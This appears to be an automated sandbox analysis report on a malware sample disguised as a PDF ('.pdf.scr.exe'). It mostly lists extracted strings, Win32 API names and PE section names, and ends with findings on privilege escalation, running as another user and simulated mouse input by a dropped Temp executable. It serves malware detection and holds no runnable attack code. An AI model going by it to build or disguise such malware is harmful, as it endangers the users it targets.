Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: paf-zaar-aear-bhar-dzar-egar-iqar-joar-kwar-lbar-lyar-maar-omar-qaar-saar-syar-tnar-yeaz-az-cyrlaz-az-latnbe-bybg-bgbn-inbs-ba-latnca-escs-czcy-gbda-dkde-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ares-boes-cles-coes-cres-does-eces-eses-gtes-hnes-mxes-nies-paes-pees-pres-pyes-sves-uyes-veet-eeeu-esfa-irfi-fifo-fofr-befr-cafr-chfr-frfr-lufr-mcgl-esgu-inhe-ilhi-inhr-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inkok-inko-krky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-bnms-mymt-mtnb-nonl-benl-nlnn-nons-zapa-inpl-plpt-brpt-ptquz-boquz-ecquz-pero-roru-rusa-inse-fise-nose-sesk-sksl-sisma-nosma-sesmj-nosmj-sesmn-fisms-fisq-alsr-ba-cyrlsr-ba-latnsr-sp-cyrlsr-sp-latnsv-fisv-sesw-kesyr-syta-inte-inth-thtn-zatr-trtt-ruuk-uaur-pkuz-uz-cyrluz-uz-latnvi-vnxh-zazh-chszh-chtzh-cnzh-hkzh-mozh-sgzh-twzu-za
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: log10
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 0log10
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ?0c0c
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: loglog10exppowasinacossqrt
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 9=@$"
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ?5wg4p
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: bc .=
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: bc .=0
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: <(lx
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: #{ =`~r=
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: %s#[k
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: "b <1=
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: #.x'=
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: #.x'=hbo
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ?tanh
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: atan2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: floor
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ldexp
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: _cabs
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: _hypot
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: frexp
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: _logb
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: _nextafter
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ?tanhatanatan2sincostanceilfloorfabsmodfldexp_cabs_hypotfmodfrexp_y0_y1_yn_logb_nextafter
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: sinhcosh
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: conout$
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `rsds
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: d:\projects\winrar\sfx\build\sfxrar32\release\sfxrar.pdb
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .text$di
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .text$mn
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .text$x
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .text$xp+
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .text$yd
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: l.text$yd0
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .idata$5
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .idata$5x2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .00cfg
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xca
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xcaa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xcu
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ,.crt$xcu
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xcz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xia
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xiaa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xiac
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xic
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xiz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xpa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xpx
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xpxa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xpz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xta
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .crt$xtz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .gfids
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rdata
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: {.rdata
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rdata$r
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rdata$sxdata
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rdata$voltmd
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: d.rdata$voltmd
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rdata$zzzdbg
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rtc$iaa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rtc$izz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rtc$taa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rtc$tzz
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .xdata$x
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$3
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$3
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$4
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$6
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$7
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$7p
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .edata
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 4.edata
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .idata$2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: <.idata$2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .idata$3
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .idata$4
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .idata$4l
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .idata$6
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .data
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .data
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .data$r
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .data$rs
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .bss0
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$5
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .didat$5@
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rsrc$01
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rsrc$01pf
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rsrc$02
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .rsrc$02"
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: showwindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: showwindow'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getdlgitem
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: enablewindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setwindowtextw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setwindowtextwd
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getparent
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setwindowpos
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setdlgitemtextw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setdlgitemtextw~
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getsystemmetrics
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getclientrect
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getwindowrect
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getwindowlongw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setwindowlongw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setprocessdefaultlayout
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getwindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: loadstringw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: loadstringw"
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: oemtocharbuffa
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: charupperw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: oemtocharbuffa<charupperw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: defwindowprocw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: defwindowprocwm
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: registerclassexw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: createwindowexw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: registerclassexwncreatewindowexw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: iswindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: destroywindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: updatewindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: updatewindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mapwindowpoints
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: copyrect
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mapwindowpointsucopyrect
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: loadcursorw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: loadcursorw\|
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: sendmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: sendmessagew!
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getdc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getdce
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: releasedc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: messageboxw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: findwindowexw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getclassnamew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: copyimage
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getclassnamewtcopyimage5
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: wvsprintfw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: wvsprintfw]
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: translatemessage
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: dispatchmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: dispatchmessagew3
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: peekmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: peekmessagew6
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: postmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: postmessagew&
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: waitforinputidle
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: iswindowvisible
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: dialogboxparamw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: enddialog
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: enddialog*
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getdlgitemtextw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getdlgitemtextws
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: senddlgitemmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setfocus
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setforegroundwindow
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setforegroundwindow{
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getsyscolor
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: loadbitmapw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: loadiconw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: destroyicon
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: isdialogmessagew
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: createcompatiblebitmap
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: createcompatibledc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: isdialogmessagew/createcompatiblebitmap0createcompatibledc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: deletedc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: deleteobject
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getdevicecaps
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getdevicecapsw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: selectobject
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: stretchblt
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: createdibsection

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

2_2_00371A91

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_00313312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

2_2_00313312

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0037EBB3 mouse_event,

2_2_0037EBB3

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_00371EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

2_2_00371EF3

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

2_2_003713F2

